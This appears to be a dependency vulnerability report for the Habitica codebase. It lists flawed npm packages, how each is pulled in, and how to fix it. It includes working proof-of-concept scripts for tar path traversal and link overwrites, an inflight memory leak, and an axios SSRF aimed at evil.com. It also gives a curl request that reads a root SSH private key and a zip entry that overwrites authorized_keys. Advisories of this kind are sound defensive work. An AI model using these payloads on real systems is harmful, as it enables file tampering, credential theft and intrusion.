"Auth=Lol; Domain=google.com; Path=/notauth",
"https://google.com/"
);
//Exploit cookie
var a = {};
console.log(a["/notauth"]["Slonser"])
}
main();
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
- Unsafe Object recursive merge
- Property definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__ defined with Object.defineProperty(), the condition that checks whether the property exists and is an object on both the target and the source passes, and the merge recurses with the target being the prototype of Object and the source being the attacker-defined object. Properties are then copied onto the Object prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).
lodash and Hoek are examples of libraries susceptible to recursive merge attacks.
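The high-level model above can be turned into a runnable demonstration. The sketch below is our own illustration, not code from any of the libraries named here:

```javascript
// A deliberately vulnerable recursive merge, matching the pseudocode above.
function merge(target, source) {
  for (const key of Object.keys(source)) {
    if (key in target && typeof target[key] === 'object' && typeof source[key] === 'object') {
      merge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// JSON.parse creates "__proto__" as an own data property, which the loop
// then walks into, recursing with Object.prototype as the merge target.
const payload = JSON.parse('{"__proto__": {"polluted": true}}');
merge({}, payload);

const wasPolluted = {}.polluted === true; // every plain object now inherits it
delete Object.prototype.polluted;         // clean up the demo
console.log(wasPolluted); // true
```

JSON.parse is essential here: an object literal written as {__proto__: ...} would set the object's prototype instead of creating an own "__proto__" property, and the merge would never reach Object.prototype.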
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.
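A runnable sketch of this pattern, with a deliberately naive setter of the theFunction(object, path, value) shape (our own illustration, not any specific library's code):

```javascript
// Naive path-setter: walks dot-separated keys, creating objects as needed.
function setByPath(obj, path, value) {
  const keys = path.split('.');
  let cur = obj;
  for (const k of keys.slice(0, -1)) {
    if (typeof cur[k] !== 'object' || cur[k] === null) cur[k] = {};
    cur = cur[k]; // for "__proto__" this steps onto Object.prototype
  }
  cur[keys[keys.length - 1]] = value;
}

setByPath({}, '__proto__.myValue', 42); // attacker-controlled path
const leaked = {}.myValue;              // 42, landed on Object.prototype
delete Object.prototype.myValue;        // clean up the demo
console.log(leaked); // 42
```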
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
| Type | Origin | Short description |
|---|---|---|
| Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
| Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
| Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
- Application server
- Web server
- Web browser
How to prevent
- Freeze the prototype: use Object.freeze(Object.prototype).
- Require schema validation of JSON input.
- Avoid using unsafe recursive merge functions.
- Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.
- As a best practice, use Map instead of Object.
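Two of the mitigations listed above can be sketched in a few lines:

```javascript
// A prototype-free object: there is no chain for "__proto__" to pollute.
const safeBag = Object.create(null);
safeBag['__proto__'] = 'just a plain key'; // stored as an ordinary own property
console.log(Object.getPrototypeOf(safeBag)); // null

// Map keys are plain values and never touch any prototype.
const m = new Map();
m.set('__proto__', 'also just a key');
console.log(m.get('__proto__'));

// Object.freeze(Object.prototype); // the global option, affects the whole process
```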
For more information on this vulnerability type:
Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade tough-cookie to version 4.1.3 or higher.
References
medium severity
- Vulnerable module: xmldom
- Introduced through: in-app-purchase@1.11.4
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xmldom@0.1.19
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xml-crypto@0.10.1 › xmldom@0.1.19
Overview
xmldom is a pure JavaScript, W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.
Affected versions of this package are vulnerable to Improper Input Validation. It does not correctly escape special characters when serializing elements that have been removed from their ancestor. This may lead to unexpected syntactic changes during XML processing in some downstream applications.
Note: Customers who use "xmldom" package, should use "@xmldom/xmldom" instead, as "xmldom" is no longer maintained.
Remediation
There is no fixed version for xmldom.
References
medium severity
- Vulnerable module: tar
- Introduced through: bcrypt@5.1.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › bcrypt@5.1.1 › @mapbox/node-pre-gyp@1.0.11 › tar@6.2.1
Remediation: Upgrade to bcrypt@6.0.0.
Overview
tar is a full-featured Tar for Node.js.
Affected versions of this package are vulnerable to Improper Handling of Unicode Encoding in Path Reservations via Unicode Sharp-S (ß) Collisions on macOS APFS. An attacker can overwrite arbitrary files by exploiting Unicode normalization collisions in filenames within a malicious tar archive on case-insensitive or normalization-insensitive filesystems.
Note:
This is only exploitable if the system is running on a filesystem such as macOS APFS or HFS+ that ignores Unicode normalization.
Workaround
This vulnerability can be mitigated by filtering out all SymbolicLink entries when extracting tarball data.
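A sketch of that workaround as a filter predicate. The entry shape assumed here (a type field with values like 'File' and 'SymbolicLink') follows node-tar's conventions:

```javascript
// Drop SymbolicLink entries before they are written to disk.
function rejectSymlinks(entryPath, entry) {
  return entry.type !== 'SymbolicLink';
}

// With node-tar this would be passed as the `filter` option, e.g.:
// tar.x({ file: 'archive.tar', cwd: 'out', filter: rejectSymlinks });
console.log(rejectSymlinks('a.txt', { type: 'File' }));        // true
console.log(rejectSymlinks('link', { type: 'SymbolicLink' })); // false
```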
PoC
const tar = require('tar');
const fs = require('fs');
const path = require('path');
const { PassThrough } = require('stream');
const exploitDir = path.resolve('race_exploit_dir');
if (fs.existsSync(exploitDir)) fs.rmSync(exploitDir, { recursive: true, force: true });
fs.mkdirSync(exploitDir);
console.log('[*] Testing...');
console.log(`[*] Extraction target: ${exploitDir}`);
// Construct stream
const stream = new PassThrough();
const contentA = 'A'.repeat(1000);
const contentB = 'B'.repeat(1000);
// Key 1: "f_ss"
const header1 = new tar.Header({
path: 'collision_ss',
mode: 0o644,
size: contentA.length,
});
header1.encode();
// Key 2: "f_ß"
const header2 = new tar.Header({
path: 'collision_ß',
mode: 0o644,
size: contentB.length,
});
header2.encode();
// Write to stream
stream.write(header1.block);
stream.write(contentA);
stream.write(Buffer.alloc(512 - (contentA.length % 512))); // Padding
stream.write(header2.block);
stream.write(contentB);
stream.write(Buffer.alloc(512 - (contentB.length % 512))); // Padding
// End
stream.write(Buffer.alloc(1024));
stream.end();
// Extract
const extract = new tar.Unpack({
cwd: exploitDir,
// Ensure jobs is high enough to allow parallel processing if locks fail
jobs: 8
});
stream.pipe(extract);
extract.on('end', () => {
console.log('[*] Extraction complete');
// Check what exists
const files = fs.readdirSync(exploitDir);
console.log('[*] Files in exploit dir:', files);
files.forEach(f => {
const p = path.join(exploitDir, f);
const stat = fs.statSync(p);
const content = fs.readFileSync(p, 'utf8');
console.log(`File: ${f}, Inode: ${stat.ino}, Content: ${content.substring(0, 10)}... (Length: ${content.length})`);
});
if (files.length === 1 || (files.length === 2 && fs.statSync(path.join(exploitDir, files[0])).ino === fs.statSync(path.join(exploitDir, files[1])).ino)) {
console.log('[*] GOOD');
} else {
console.log('[-] No collision');
}
});
Remediation
Upgrade tar to version 7.5.4 or higher.
References
medium severity
- Vulnerable module: decompress-tar
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-build@3.0.0 › decompress@4.2.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-build@3.0.0 › decompress@4.2.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-build@3.0.0 › decompress@4.2.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-build@3.0.0 › decompress@4.2.1 › decompress-tarbz2@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-build@3.0.0 › decompress@4.2.1 › decompress-tarbz2@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-build@3.0.0 › decompress@4.2.1 › decompress-tarbz2@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-build@3.0.0 › decompress@4.2.1 › decompress-targz@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-build@3.0.0 › decompress@4.2.1 › decompress-targz@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-build@3.0.0 › decompress@4.2.1 › decompress-targz@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-build@3.0.0 › download@6.2.5 › decompress@4.2.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-build@3.0.0 › download@6.2.5 › decompress@4.2.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-build@3.0.0 › download@6.2.5 › decompress@4.2.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › download@7.1.0 › decompress@4.2.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › download@7.1.0 › decompress@4.2.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › download@7.1.0 › decompress@4.2.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-build@3.0.0 › download@6.2.5 › decompress@4.2.1 › decompress-tarbz2@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-build@3.0.0 › download@6.2.5 › decompress@4.2.1 › decompress-tarbz2@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-build@3.0.0 › download@6.2.5 › decompress@4.2.1 › decompress-tarbz2@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › download@7.1.0 › decompress@4.2.1 › decompress-tarbz2@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › download@7.1.0 › decompress@4.2.1 › decompress-tarbz2@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › download@7.1.0 › decompress@4.2.1 › decompress-tarbz2@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-build@3.0.0 › download@6.2.5 › decompress@4.2.1 › decompress-targz@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-build@3.0.0 › download@6.2.5 › decompress@4.2.1 › decompress-targz@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-build@3.0.0 › download@6.2.5 › decompress@4.2.1 › decompress-targz@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › download@7.1.0 › decompress@4.2.1 › decompress-targz@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › download@7.1.0 › decompress@4.2.1 › decompress-targz@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › download@7.1.0 › decompress@4.2.1 › decompress-targz@4.1.1 › decompress-tar@4.1.1
Overview
decompress-tar is a tar plugin for decompress.
Affected versions of this package are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip). It is possible to bypass the security measures provided by decompress and conduct ZIP path traversal through symlinks.
PoC
const decompress = require('decompress');
decompress('slip.tar.gz', 'dist').then(files => {
console.log('done!');
});
Details
It is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a "../../file.exe" location and thus break out of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.
The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:
+2018-04-15 22:04:29 ..... 19 19 good.txt
+2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys
Remediation
There is no fixed version for decompress-tar.
References
medium severity
- Vulnerable module: node-forge
- Introduced through: @parse/node-apn@5.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @parse/node-apn@5.2.3 › node-forge@1.3.1
Remediation: Upgrade to @parse/node-apn@7.0.0.
Overview
node-forge is a JavaScript implementations of network transports, cryptography, ciphers, PKI, message digests, and various utilities.
Affected versions of this package are vulnerable to Integer Overflow or Wraparound via the derToOid function in the asn1.js file, which decodes ASN.1 structures containing OIDs with oversized arcs. An attacker can bypass security decisions based on OID validation by crafting malicious ASN.1 data that exploits 32-bit bitwise truncation.
Remediation
Upgrade node-forge to version 1.3.2 or higher.
References
medium severity
- Vulnerable module: axios
- Introduced through: @slack/webhook@6.1.0, apple-auth@1.0.9 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @slack/webhook@6.1.0 › axios@0.21.4
Remediation: Upgrade to @slack/webhook@7.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apple-auth@1.0.9 › axios@0.21.4
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amplitude@6.0.0 › axios@0.26.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › node-gcm@1.1.4 › axios@1.6.8
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › winston-loggly-bulk@3.3.3 › node-loggly-bulk@4.0.2 › axios@1.7.4
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to the allowAbsoluteUrls attribute being ignored in the call to the buildFullPath function from the HTTP adapter. An attacker could launch SSRF attacks or exfiltrate sensitive data by tricking applications into sending requests to malicious endpoints.
PoC
const axios = require('axios');
const client = axios.create({baseURL: 'http://example.com/', allowAbsoluteUrls: false});
client.get('http://evil.com');
Remediation
Upgrade axios to version 0.30.0, 1.8.2 or higher.
References
medium severity
- Vulnerable module: axios
- Introduced through: @slack/webhook@6.1.0, apple-auth@1.0.9 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @slack/webhook@6.1.0 › axios@0.21.4
Remediation: Upgrade to @slack/webhook@7.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apple-auth@1.0.9 › axios@0.21.4
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amplitude@6.0.0 › axios@0.26.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › node-gcm@1.1.4 › axios@1.6.8
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › winston-loggly-bulk@3.3.3 › node-loggly-bulk@4.0.2 › axios@1.7.4
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to not setting allowAbsoluteUrls to false by default when processing a requested URL in buildFullPath(). It may not be obvious that this value is being used with the less safe default, and URLs that are expected to be blocked may be accepted. This is a bypass of the fix for the vulnerability described in CVE-2025-27152.
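The behavior above can be sketched with a simplified helper. This is illustrative only, mimicking what a buildFullPath-style function does when `allowAbsoluteUrls` is not explicitly forced to false; the function signature and option handling here are assumptions, not axios source.

```javascript
// Illustrative sketch (not axios code): with the unsafe default, an
// absolute requested URL overrides baseURL instead of being blocked.
function buildFullPath(baseURL, requestedURL, allowAbsoluteUrls) {
  const isAbsolute = /^([a-z][a-z\d+\-.]*:)?\/\//i.test(requestedURL);
  if (isAbsolute && allowAbsoluteUrls !== false) {
    // Unsafe default path: the absolute URL wins, so a request meant
    // for baseURL can be steered to an attacker-chosen endpoint.
    return requestedURL;
  }
  // Safe path: treat the requested URL as relative to baseURL.
  return baseURL.replace(/\/+$/, '') + '/' + requestedURL.replace(/^\/+/, '');
}

console.log(buildFullPath('http://example.com/', 'http://evil.com/steal', undefined));
// → 'http://evil.com/steal' (absolute URL accepted by default)
console.log(buildFullPath('http://example.com/', 'http://evil.com/steal', false));
// → 'http://example.com/http://evil.com/steal' (absolute URL neutralized)
```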
Remediation
Upgrade axios to version 0.30.0, 1.8.3 or higher.
References
medium severity
- Vulnerable module: inflight
- Introduced through: glob@8.1.0, apidoc@0.54.0 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › glob@8.1.0 › inflight@1.0.6
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apidoc@0.54.0 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › rimraf@3.0.2 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › bcrypt@5.1.1 › @mapbox/node-pre-gyp@1.0.11 › rimraf@3.0.2 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › vinyl-fs@3.0.3 › glob-stream@6.1.0 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin@7.0.1 › globby@10.0.2 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › eslint@8.57.1 › file-entry-cache@6.0.1 › flat-cache@3.2.0 › rimraf@3.0.2 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › exec-buffer@3.2.0 › rimraf@2.7.1 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › eslint-config-habitrpg@6.2.3 › eslint@6.8.0 › file-entry-cache@5.0.1 › flat-cache@2.0.1 › rimraf@2.6.3 › glob@7.2.3 › inflight@1.0.6
Overview
Affected versions of this package are vulnerable to Missing Release of Resource after Effective Lifetime via the makeres function, which fails to delete keys from the reqs object after callbacks execute. The keys remain in the reqs object, leading to unbounded memory growth and eventual resource exhaustion.
Exploiting this vulnerability can crash the Node.js process or the application.
Note: This library is not maintained, and there is currently no fix for this issue. To avoid the vulnerability, several dependent packages have eliminated their use of this library.
To trigger the memory leak, an attacker would need the ability to execute or influence the asynchronous operations that use the inflight module within the application. This typically requires access to the internal workings of the server or application, which is not commonly exposed to remote users. Therefore, "Attack vector" is marked as "Local".
PoC
const inflight = require('inflight');
function testInflight() {
  let i = 0;
  function scheduleNext() {
    const key = `key-${i++}`;
    const callback = () => {};
    // Register many callbacks under the same key; the entries are never
    // released from inflight's internal reqs object.
    for (let j = 0; j < 1000000; j++) {
      inflight(key, callback);
    }
    if (i % 100 === 0) {
      console.log(process.memoryUsage());
    }
    setImmediate(scheduleNext);
  }
  scheduleNext();
}
testInflight();
Remediation
There is no fixed version for inflight.
References
medium severity
- Vulnerable module: tar
- Introduced through: bcrypt@5.1.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › bcrypt@5.1.1 › @mapbox/node-pre-gyp@1.0.11 › tar@6.2.1
Remediation: Upgrade to bcrypt@6.0.0.
Overview
tar is a full-featured Tar for Node.js.
Affected versions of this package are vulnerable to Directory Traversal via processing of hardlinks. An attacker can read or overwrite arbitrary files on the file system by crafting a malicious TAR archive that bypasses path traversal protections during extraction.
Details
A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration, and other critical system files.
Directory Traversal vulnerabilities can be generally divided into two types:
- Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.
If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.
curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
Note %2e is the URL encoded version of . (dot).
- Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as
Zip-Slip.
One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.
The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:
2018-04-15 22:04:29 ..... 19 19 good.txt
2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys
Remediation
Upgrade tar to version 7.5.7 or higher.
References
medium severity
- Vulnerable module: tar
- Introduced through: bcrypt@5.1.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › bcrypt@5.1.1 › @mapbox/node-pre-gyp@1.0.11 › tar@6.2.1
Remediation: Upgrade to bcrypt@6.0.0.
Overview
tar is a full-featured Tar for Node.js.
Affected versions of this package are vulnerable to Directory Traversal via insufficient sanitization of the linkpath parameter during archive extraction. An attacker can overwrite arbitrary files or create malicious symbolic links by crafting a tar archive with hardlink or symlink entries that resolve outside the intended extraction directory.
PoC
const fs = require('fs')
const path = require('path')
const tar = require('tar')
const out = path.resolve('out_repro')
const secret = path.resolve('secret.txt')
const tarFile = path.resolve('exploit.tar')
const targetSym = '/etc/passwd'
// Cleanup & Setup
try { fs.rmSync(out, {recursive:true, force:true}); fs.unlinkSync(secret) } catch {}
fs.mkdirSync(out)
fs.writeFileSync(secret, 'ORIGINAL_DATA')
// 1. Craft malicious Link header (Hardlink to absolute local file)
const h1 = new tar.Header({
path: 'exploit_hard',
type: 'Link',
size: 0,
linkpath: secret
})
h1.encode()
// 2. Craft malicious Symlink header (Symlink to /etc/passwd)
const h2 = new tar.Header({
path: 'exploit_sym',
type: 'SymbolicLink',
size: 0,
linkpath: targetSym
})
h2.encode()
// Write binary tar
fs.writeFileSync(tarFile, Buffer.concat([ h1.block, h2.block, Buffer.alloc(1024) ]))
console.log('[*] Extracting malicious tarball...')
// 3. Extract with default secure settings
tar.x({
cwd: out,
file: tarFile,
preservePaths: false
}).then(() => {
console.log('[*] Verifying payload...')
// Test Hardlink Overwrite
try {
fs.writeFileSync(path.join(out, 'exploit_hard'), 'OVERWRITTEN')
if (fs.readFileSync(secret, 'utf8') === 'OVERWRITTEN') {
console.log('[+] VULN CONFIRMED: Hardlink overwrite successful')
} else {
console.log('[-] Hardlink failed')
}
} catch (e) {}
// Test Symlink Poisoning
try {
if (fs.readlinkSync(path.join(out, 'exploit_sym')) === targetSym) {
console.log('[+] VULN CONFIRMED: Symlink points to absolute path')
} else {
console.log('[-] Symlink failed')
}
} catch (e) {}
})
Details
A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration, and other critical system files.
Directory Traversal vulnerabilities can be generally divided into two types:
- Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.
If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.
